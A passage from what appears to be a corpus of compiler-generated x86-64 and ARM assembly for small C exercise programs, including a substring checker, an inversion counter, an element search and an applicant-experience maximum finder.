r1, #0 asr r0, r3, #31 asr r1, r3, #31 sub r3, fp, #52 ldmia r3, {r2-r3} eor r8, r0, r2 eor r9, r1, r3 subs r8, r8, r0 sbc r9, r9, r1 mov r2, r8 mov r3, r9 cmp r5, r3 cmpeq r4, r2 bcs .L18 ldr r3, [fp, #-40] ldr r2, [fp, #-52] mul r1, r2, r3 ldr r2, [fp, #-48] ldr r3, [fp, #-44] mul r3, r2, r3 add ip, r1, r3 ldr r2, [fp, #-44] ldr r3, [fp, #-52] umull r0, r1, r2, r3 add r3, ip, r1 mov r1, r3 sub r3, fp, #36 ldmia r3, {r2-r3} adds ip, r0, r2 str ip, [fp, #-188] adc r3, r1, r3 str r3, [fp, #-184] sub r3, fp, #60 ldmia r3, {r2-r3} sub r1, fp, #188 ldmia r1, {r0-r1} cmp r3, r1 cmpeq r2, r0 beq .L42 .L18: bl abort .L42: nop .L19: ldr r3, [fp, #-108] str r3, [fp, #-148] ldr r3, [fp, #-100] str r3, [fp, #-144] ldr r3, [fp, #-144] cmp r3, #0 beq .L43 ldr r1, [fp, #-144] ldr r0, [fp, #-148] bl __aeabi_uidiv mov r3, r0 str r3, [fp, #-140] ldr r3, [fp, #-148] ldr r1, [fp, #-144] mov r0, r3 bl __aeabi_uidivmod mov r3, r1 str r3, [fp, #-136] ldr r2, [fp, #-136] ldr r3, [fp, #-144] cmp r2, r3 bcs .L21 ldr r3, [fp, #-140] ldr r2, [fp, #-144] mul r2, r3, r2 ldr r3, [fp, #-136] add r3, r2, r3 ldr r2, [fp, #-148] cmp r2, r3 beq .L22 .L21: bl abort .L22: ldr r3, [fp, #-108] str r3, [fp, #-132] ldr r3, [fp, #-100] str r3, [fp, #-128] ldr r3, [fp, #-132] lsl r3, r3, #1 cmp r3, #0 bne .L23 ldr r3, [fp, #-128] cmn r3, #1 beq .L44 .L23: ldr r1, [fp, #-128] ldr r0, [fp, #-132] bl __aeabi_idiv mov r3, r0 str r3, [fp, #-124] ldr r3, [fp, #-132] ldr r1, [fp, #-128] mov r0, r3 bl __aeabi_idivmod mov r3, r1 str r3, [fp, #-120] ldr r3, [fp, #-120] cmp r3, #0 rsblt r3, r3, #0 mov r2, r3 ldr r3, [fp, #-128] cmp r3, #0 rsblt r3, r3, #0 cmp r2, r3 bcs .L24 ldr r3, [fp, #-124] ldr r2, [fp, #-128] mul r2, r3, r2 ldr r3, [fp, #-120] add r3, r2, r3 ldr r2, [fp, #-132] cmp r2, r3 bne .L24 ldr r3, [fp, #-132] lsr r3, r3, #31 and r2, r3, #255 ldr r3, [fp, #-120] lsr r3, r3, #31 and r3, r3, #255 eor r3, r3, r2 and r3, r3, #255 cmp r3, #0 beq .L25 ldr r3, [fp, #-120] cmp r3, #0 beq .L25 .L24: bl abort .L25: ldr r3, [fp, #-108] strh r3, [fp, #-164] @ movhi ldr r3, [fp, #-100] strh r3, [fp, #-162] @ movhi ldrh r3, [fp, #-162] cmp r3, #0 beq .L45 ldrh r2, [fp, #-164] ldrh r3, [fp, #-162] mov r1, r3 mov r0, r2 bl __aeabi_uidiv mov r3, r0 strh r3, [fp, #-160] @ movhi ldrh r2, [fp, #-164] ldrh r3, [fp, #-162] mov r1, r3 mov r0, r2 bl __aeabi_uidivmod mov r3, r1 strh r3, [fp, #-158] @ movhi ldrh r2, [fp, #-158] ldrh r3, [fp, #-162] cmp r2, r3 bcs .L27 ldrh r3, [fp, #-160] ldrh r2, [fp, #-162] mul r2, r3, r2 ldrh r3, [fp, #-158] add r2, r2, r3 ldrh r3, [fp, #-164] cmp r2, r3 beq .L28 .L27: bl abort .L28: ldr r3, [fp, #-108] strh r3, [fp, #-156] @ movhi ldr r3, [fp, #-100] strh r3, [fp, #-154] @ movhi ldrsh r2, [fp, #-156] ldrsh r3, [fp, #-154] mov r1, r3 mov r0, r2 bl __aeabi_idiv mov r3, r0 strh r3, [fp, #-152] @ movhi ldrsh r2, [fp, #-156] ldrsh r3, [fp, #-154] mov r1, r3 mov r0, r2 bl __aeabi_idivmod mov r3, r1 strh r3, [fp, #-150] @ movhi ldrsh r3, [fp, #-150] cmp r3, #0 rsblt r3, r3, #0 lsl r3, r3, #16 lsr r3, r3, #16 mov r2, r3 ldrsh r3, [fp, #-154] cmp r3, #0 bge .L29 ldrh r3, [fp, #-154] rsb r3, r3, #0 lsl r3, r3, #16 lsr r3, r3, #16 b .L30 .L29: ldrh r3, [fp, #-154] .L30: cmp r3, r2 ble .L31 ldrh r3, [fp, #-152] ldrh r2, [fp, #-154] mul r3, r2, r3 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-150] add r3, r2, r3 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #16 asr r3, r3, #16 ldrsh r2, [fp, #-156] cmp r2, r3 beq .L32 .L31: bl abort .L32: ldr r3, [fp, #-108] strb r3, [fp, #-172] ldr r3, [fp, #-100] strb r3, [fp, #-171] ldrb r3, [fp, #-171] @ zero_extendqisi2 cmp r3, #0 beq .L46 ldrb r2, [fp, #-172] @ zero_extendqisi2 ldrb r3, [fp, #-171] @ zero_extendqisi2 mov r1, r3 mov r0, r2 bl __aeabi_uidiv mov r3, r0 strb r3, [fp, #-170] ldrb r2, [fp, #-172] @ zero_extendqisi2 ldrb r3, [fp, #-171] @ zero_extendqisi2 mov r1, r3 mov r0, r2 bl __aeabi_uidivmod mov r3, r1 strb r3, [fp, #-169] ldrb r2, [fp, #-169] @ zero_extendqisi2 ldrb r3, [fp, #-171] @ zero_extendqisi2 cmp r2, r3 bcs .L34 ldrb r3, [fp, #-170] @ zero_extendqisi2 ldrb r2, [fp, #-171] @ zero_extendqisi2 mul r2, r3, r2 ldrb r3, [fp, #-169] @ zero_extendqisi2 add r2, r2, r3 ldrb r3, [fp, #-172] @ zero_extendqisi2 cmp r2, r3 beq .L35 .L34: bl abort .L35: ldr r3, [fp, #-108] strb r3, [fp, #-168] ldr r3, [fp, #-100] strb r3, [fp, #-167] ldrsb r2, [fp, #-168] ldrsb r3, [fp, #-167] mov r1, r3 mov r0, r2 bl __aeabi_idiv mov r3, r0 strb r3, [fp, #-166] ldrsb r2, [fp, #-168] ldrsb r3, [fp, #-167] mov r1, r3 mov r0, r2 bl __aeabi_idivmod mov r3, r1 strb r3, [fp, #-165] ldrsb r3, [fp, #-165] cmp r3, #0 rsblt r3, r3, #0 and r3, r3, #255 mov r2, r3 ldrsb r3, [fp, #-167] cmp r3, #0 bge .L36 ldrb r3, [fp, #-167] @ zero_extendqisi2 rsb r3, r3, #0 and r3, r3, #255 b .L37 .L36: ldrb r3, [fp, #-167] @ zero_extendqisi2 .L37: cmp r3, r2 ble .L38 ldrb r3, [fp, #-166] @ zero_extendqisi2 ldrb r2, [fp, #-167] @ zero_extendqisi2 mul r3, r2, r3 and r2, r3, #255 ldrb r3, [fp, #-165] @ zero_extendqisi2 add r3, r2, r3 and r3, r3, #255 lsl r3, r3, #24 asr r3, r3, #24 ldrsb r2, [fp, #-168] cmp r2, r3 beq .L14 .L38: bl abort .L40: nop b .L14 .L41: nop b .L14 .L43: nop b .L14 .L44: nop b .L14 .L45: nop b .L14 .L46: nop .L14: sub r3, fp, #116 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-204] adc r3, r3, #0 str r3, [fp, #-200] sub r4, fp, #204 ldmia r4, {r3-r4} str r3, [fp, #-116] str r4, [fp, #-112] .L12: sub r1, fp, #116 ldmia r1, {r0-r1} ldr r2, .L47 mov r3, #0 cmp r2, r0 sbcs r3, r3, r1 bge .L39 mov r0, #0 bl exit .L48: .align 2 .L47: .word 9999 .size main, .-main .data .align 3 .type seed.4781, %object .size seed.4781, 8 seed.4781: .word 47114711 .word 0 .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "936610.c" .intel_syntax noprefix .text .globl substring .type substring, @function substring: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov rax, QWORD PTR -24[rbp] mov rdi, rax call strlen@PLT mov DWORD PTR -8[rbp], eax mov rax, QWORD PTR -32[rbp] mov rdi, rax call strlen@PLT mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] cmp eax, DWORD PTR -4[rbp] jle .L2 mov eax, 0 jmp .L3 .L2: mov DWORD PTR -12[rbp], 0 jmp .L4 .L6: mov eax, DWORD PTR -8[rbp] movsx rdx, eax mov eax, DWORD PTR -12[rbp] movsx rcx, eax mov rax, QWORD PTR -32[rbp] add rcx, rax mov rax, QWORD PTR -24[rbp] mov rsi, rcx mov rdi, rax call strncmp@PLT test eax, eax jne .L5 mov eax, 1 jmp .L3 .L5: add DWORD PTR -12[rbp], 1 .L4: mov eax, DWORD PTR -4[rbp] sub eax, DWORD PTR -8[rbp] cmp DWORD PTR -12[rbp], eax jl .L6 mov eax, 0 .L3: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size substring, .-substring .section .rodata .LC0: .string "%s is substring of %s\n" .LC1: .string "%s is NOT substring of %s\n" .text .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 224 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rax, -224[rbp] mov rdi, rax mov eax, 0 call gets@PLT lea rax, -112[rbp] mov rdi, rax mov eax, 0 call gets@PLT lea rdx, -112[rbp] lea rax, -224[rbp] mov rsi, rdx mov rdi, rax call substring test eax, eax je .L8 lea rdx, -112[rbp] lea rax, -224[rbp] mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT jmp .L9 .L8: lea rdx, -112[rbp] lea rax, -224[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT .L9: mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L11 call __stack_chk_fail@PLT .L11: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "936610.c" .text .align 2 .global substring .syntax unified .arm .fpu softvfp .type substring, %function substring: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-24] str r1, [fp, #-28] ldr r0, [fp, #-24] bl strlen mov r3, r0 str r3, [fp, #-12] ldr r0, [fp, #-28] bl strlen mov r3, r0 str r3, [fp, #-8] ldr r2, [fp, #-12] ldr r3, [fp, #-8] cmp r2, r3 ble .L2 mov r3, #0 b .L3 .L2: mov r3, #0 str r3, [fp, #-16] b .L4 .L6: ldr r3, [fp, #-16] ldr r2, [fp, #-28] add r3, r2, r3 ldr r2, [fp, #-12] mov r1, r3 ldr r0, [fp, #-24] bl strncmp mov r3, r0 cmp r3, #0 bne .L5 mov r3, #1 b .L3 .L5: ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] .L4: ldr r2, [fp, #-8] ldr r3, [fp, #-12] sub r3, r2, r3 ldr r2, [fp, #-16] cmp r2, r3 blt .L6 mov r3, #0 .L3: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size substring, .-substring .section .rodata .align 2 .LC0: .ascii "%s is substring of %s\012\000" .align 2 .LC1: .ascii "%s is NOT substring of %s\012\000" .align 2 .LC2: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 208 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #208 ldr r3, .L12 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 sub r3, fp, #208 mov r0, r3 bl gets sub r3, fp, #108 mov r0, r3 bl gets sub r2, fp, #108 sub r3, fp, #208 mov r1, r2 mov r0, r3 bl substring mov r3, r0 cmp r3, #0 beq .L8 sub r2, fp, #108 sub r3, fp, #208 mov r1, r3 ldr r0, .L12+4 bl printf b .L9 .L8: sub r2, fp, #108 sub r3, fp, #208 mov r1, r3 ldr r0, .L12+8 bl printf .L9: mov r3, #0 ldr r2, .L12 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L11 bl __stack_chk_fail .L11: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L13: .align 2 .L12: .word .LC2 .word .LC0 .word .LC1 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "651467.c" .intel_syntax noprefix .text .globl flash_partition_init .type flash_partition_init, @function flash_partition_init: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size flash_partition_init, .-flash_partition_init .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "651467.c" .text .align 2 .global flash_partition_init .syntax unified .arm .fpu softvfp .type flash_partition_init, %function flash_partition_init: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size flash_partition_init, .-flash_partition_init .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "436173.c" .intel_syntax noprefix .text .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "436173.c" .text .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "496927.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "How many applicants: " .LC1: .string "%d" .align 8 .LC2: .string "Years of experience of applicant %d: " .align 8 .LC3: .string "The maximum year of experience of is : %d by applicant %d.\n" .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov DWORD PTR -36[rbp], 1 lea rdi, .LC0[rip] mov eax, 0 call printf@PLT lea rax, -40[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT mov eax, DWORD PTR -40[rbp] cdqe sal rax, 2 mov rdi, rax call malloc@PLT mov QWORD PTR -16[rbp], rax mov DWORD PTR -28[rbp], 0 jmp .L2 .L3: mov eax, DWORD PTR -36[rbp] mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT mov eax, DWORD PTR -28[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -16[rbp] add rax, rdx mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT add DWORD PTR -36[rbp], 1 add DWORD PTR -28[rbp], 1 .L2: mov eax, DWORD PTR -40[rbp] cmp DWORD PTR -28[rbp], eax jl .L3 mov rax, QWORD PTR -16[rbp] mov eax, DWORD PTR [rax] mov DWORD PTR -24[rbp], eax mov DWORD PTR -20[rbp], 0 jmp .L4 .L6: mov eax, DWORD PTR -20[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -16[rbp] add rax, rdx mov eax, DWORD PTR [rax] cmp DWORD PTR -24[rbp], eax jge .L5 mov eax, DWORD PTR -20[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -16[rbp] add rax, rdx mov eax, DWORD PTR [rax] mov DWORD PTR -24[rbp], eax mov eax, DWORD PTR -20[rbp] add eax, 1 mov DWORD PTR -32[rbp], eax .L5: add DWORD PTR -20[rbp], 1 .L4: mov eax, DWORD PTR -40[rbp] cmp DWORD PTR -20[rbp], eax jl .L6 mov edx, DWORD PTR -32[rbp] mov eax, DWORD PTR -24[rbp] mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L8 call __stack_chk_fail@PLT .L8: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "496927.c" .text .section .rodata .align 2 .LC0: .ascii "How many applicants: \000" .align 2 .LC1: .ascii "%d\000" .align 2 .LC2: .ascii "Years of experience of applicant %d: \000" .align 2 .LC3: .ascii "The maximum year of experience of is : %d by applic" .ascii "ant %d.\012\000" .align 2 .LC4: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #32 ldr r3, .L9 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r3, #1 str r3, [fp, #-32] ldr r0, .L9+4 bl printf sub r3, fp, #36 mov r1, r3 ldr r0, .L9+8 bl __isoc99_scanf ldr r3, [fp, #-36] lsl r3, r3, #2 mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-12] mov r3, #0 str r3, [fp, #-24] b .L2 .L3: ldr r1, [fp, #-32] ldr r0, .L9+12 bl printf ldr r3, [fp, #-24] lsl r3, r3, #2 ldr r2, [fp, #-12] add r3, r2, r3 mov r1, r3 ldr r0, .L9+8 bl __isoc99_scanf ldr r3, [fp, #-32] add r3, r3, #1 str r3, [fp, #-32] ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L2: ldr r3, [fp, #-36] ldr r2, [fp, #-24] cmp r2, r3 blt .L3 ldr r3, [fp, #-12] ldr r3, [r3] str r3, [fp, #-20] mov r3, #0 str r3, [fp, #-16] b .L4 .L6: ldr r3, [fp, #-16] lsl r3, r3, #2 ldr r2, [fp, #-12] add r3, r2, r3 ldr r3, [r3] ldr r2, [fp, #-20] cmp r2, r3 bge .L5 ldr r3, [fp, #-16] lsl r3, r3, #2 ldr r2, [fp, #-12] add r3, r2, r3 ldr r3, [r3] str r3, [fp, #-20] ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-28] .L5: ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] .L4: ldr r3, [fp, #-36] ldr r2, [fp, #-16] cmp r2, r3 blt .L6 ldr r2, [fp, #-28] ldr r1, [fp, #-20] ldr r0, .L9+16 bl printf mov r3, #0 ldr r2, .L9 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L8 bl __stack_chk_fail .L8: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L10: .align 2 .L9: .word .LC4 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "748548.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "Enter the size of the array" .LC1: .string "%d" .LC2: .string "Enter the elements" .align 8 .LC3: .string "The no of inversions required to sort the given array is 0" .align 8 .LC4: .string "The no of inversions required to sort the given array is %d\n" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 448 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov DWORD PTR -420[rbp], 0 lea rdi, .LC0[rip] call puts@PLT lea rax, -436[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT lea rdi, .LC2[rip] call puts@PLT mov DWORD PTR -424[rbp], 0 jmp .L2 .L3: lea rdx, -416[rbp] mov eax, DWORD PTR -424[rbp] cdqe sal rax, 2 add rax, rdx mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT add DWORD PTR -424[rbp], 1 .L2: mov eax, DWORD PTR -436[rbp] cmp DWORD PTR -424[rbp], eax jl .L3 mov eax, DWORD PTR -436[rbp] cmp eax, 1 jne .L4 lea rdi, .LC3[rip] call puts@PLT .L4: mov DWORD PTR -432[rbp], 0 jmp .L5 .L9: mov eax, DWORD PTR -432[rbp] add eax, 1 mov DWORD PTR -428[rbp], eax jmp .L6 .L8: mov eax, DWORD PTR -432[rbp] cdqe mov edx, DWORD PTR -416[rbp+rax*4] mov eax, DWORD PTR -428[rbp] cdqe mov eax, DWORD PTR -416[rbp+rax*4] cmp edx, eax jle .L7 add DWORD PTR -420[rbp], 1 .L7: add DWORD PTR -428[rbp], 1 .L6: mov eax, DWORD PTR -436[rbp] cmp DWORD PTR -428[rbp], eax jl .L8 add DWORD PTR -432[rbp], 1 .L5: mov eax, DWORD PTR -436[rbp] sub eax, 1 cmp DWORD PTR -432[rbp], eax jl .L9 mov eax, DWORD PTR -420[rbp] mov esi, eax lea rdi, .LC4[rip] mov eax, 0 call printf@PLT mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L11 call __stack_chk_fail@PLT .L11: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "748548.c" .text .section .rodata .align 2 .LC0: .ascii "Enter the size of the array\000" .align 2 .LC1: .ascii "%d\000" .align 2 .LC2: .ascii "Enter the elements\000" .align 2 .LC3: .ascii "The no of inversions required to sort the given arr" .ascii "ay is 0\000" .align 2 .LC4: .ascii "The no of inversions required to sort the given arr" .ascii "ay is %d\012\000" .align 2 .LC5: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 424 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #424 ldr r3, .L12 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r3, #0 str r3, [fp, #-412] ldr r0, .L12+4 bl puts sub r3, fp, #428 mov r1, r3 ldr r0, .L12+8 bl __isoc99_scanf ldr r0, .L12+12 bl puts mov r3, #0 str r3, [fp, #-416] b .L2 .L3: sub r2, fp, #408 ldr r3, [fp, #-416] lsl r3, r3, #2 add r3, r2, r3 mov r1, r3 ldr r0, .L12+8 bl __isoc99_scanf ldr r3, [fp, #-416] add r3, r3, #1 str r3, [fp, #-416] .L2: ldr r3, [fp, #-428] ldr r2, [fp, #-416] cmp r2, r3 blt .L3 ldr r3, [fp, #-428] cmp r3, #1 bne .L4 ldr r0, .L12+16 bl puts .L4: mov r3, #0 str r3, [fp, #-424] b .L5 .L9: ldr r3, [fp, #-424] add r3, r3, #1 str r3, [fp, #-420] b .L6 .L8: ldr r3, [fp, #-424] lsl r3, r3, #2 sub r2, fp, #4 add r3, r2, r3 ldr r2, [r3, #-404] ldr r3, [fp, #-420] lsl r3, r3, #2 sub r1, fp, #4 add r3, r1, r3 ldr r3, [r3, #-404] cmp r2, r3 ble .L7 ldr r3, [fp, #-412] add r3, r3, #1 str r3, [fp, #-412] .L7: ldr r3, [fp, #-420] add r3, r3, #1 str r3, [fp, #-420] .L6: ldr r3, [fp, #-428] ldr r2, [fp, #-420] cmp r2, r3 blt .L8 ldr r3, [fp, #-424] add r3, r3, #1 str r3, [fp, #-424] .L5: ldr r3, [fp, #-428] sub r3, r3, #1 ldr r2, [fp, #-424] cmp r2, r3 blt .L9 ldr r1, [fp, #-412] ldr r0, .L12+20 bl printf mov r3, #0 ldr r2, .L12 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L11 bl __stack_chk_fail .L11: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L13: .align 2 .L12: .word .LC5 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .word .LC4 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "124527.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "%d" .LC1: .string "Element found at positions %d" .LC2: .string ", %d" .LC3: .string "Element found at position %d" .LC4: .string "Element not found" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 lea r11, -36864[rsp] .LPSRL0: sub rsp, 4096 or DWORD PTR [rsp], 0 cmp rsp, r11 jne .LPSRL0 sub rsp, 3184 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov DWORD PTR -40028[rbp], 0 lea rax, -40036[rbp] mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT mov DWORD PTR -40024[rbp], 0 jmp .L2 .L3: lea rdx, -40016[rbp] mov eax, DWORD PTR -40024[rbp] cdqe sal rax, 2 add rax, rdx mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT add DWORD PTR -40024[rbp], 1 .L2: mov eax, DWORD PTR -40036[rbp] cmp DWORD PTR -40024[rbp], eax jl .L3 lea rax, -40032[rbp] mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT mov DWORD PTR -40020[rbp], 0 jmp .L4 .L8: mov eax, DWORD PTR -40020[rbp] cdqe mov edx, DWORD PTR -40016[rbp+rax*4] mov eax, DWORD PTR -40032[rbp] cmp edx, eax jne .L5 mov eax, DWORD PTR -40032[rbp] cmp eax, -18 jne .L6 cmp DWORD PTR -40028[rbp], 0 jne .L7 mov eax, DWORD PTR -40020[rbp] add eax, 1 mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT mov DWORD PTR -40028[rbp], 1 jmp .L5 .L7: mov eax, DWORD PTR -40020[rbp] add eax, 1 mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT jmp .L5 .L6: mov eax, DWORD PTR -40020[rbp] add eax, 1 mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov DWORD PTR -40028[rbp], 1 .L5: add DWORD PTR -40020[rbp], 1 .L4: mov eax, DWORD PTR -40036[rbp] cmp DWORD PTR -40020[rbp], eax jl .L8 cmp DWORD PTR -40028[rbp], 0 jne .L9 lea rdi, .LC4[rip] mov eax, 0 call printf@PLT .L9: mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L11 call __stack_chk_fail@PLT .L11: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 